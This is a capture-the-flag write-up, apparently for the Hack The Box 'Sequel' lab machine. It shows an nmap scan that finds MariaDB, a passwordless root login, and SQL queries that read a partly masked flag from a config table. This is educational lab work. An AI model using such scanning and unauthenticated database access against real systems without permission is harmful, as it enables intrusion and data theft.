Sequel

Resolution summary

  • Maria DB was set up with no authentication. Login with root and no password

Improved skills

  • Nmap script to find quick vulnerability

Used tools

  • nmap
  • mysql cli

Information Gathering

Nmap Scan

# Nmap 7.93 scan initiated Wed Mar 15 09:44:32 2023 as: nmap -sC -oA nmap/nmap 10.129.204.145
Nmap scan report for 10.129.204.145
Host is up (0.052s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 86
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, ODBCClient, LongColumnFlag, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: {v_WwrW<fkfAPP|DyZ3/
|_  Auth Plugin Name: mysql_native_password

# Nmap done at Wed Mar 15 09:45:17 2023 -- 1 IP address (1 host up) scanned in 45.07 seconds

Enumeration

Port 3306 - MariaDB / Mysql

Maria DB was set up with no pasword and using native password plugin. More info here: https://mariadb.com/kb/en/authentication-plugin-mysql_native_password/

Exploitation

No auth

Enumeration showed native-password and no password set. Login was simple:

No auth to login

Traveling through the database allowed us to find the flag easily in the htb database.

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.050 sec)

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4b**********15da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)

MariaDB [htb]>

Lateral Movement to user

not required for flag

Privilege Escalation

not required for flag

Trophy & Loot

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  5 | flag                  | 7b4b**********15da8 |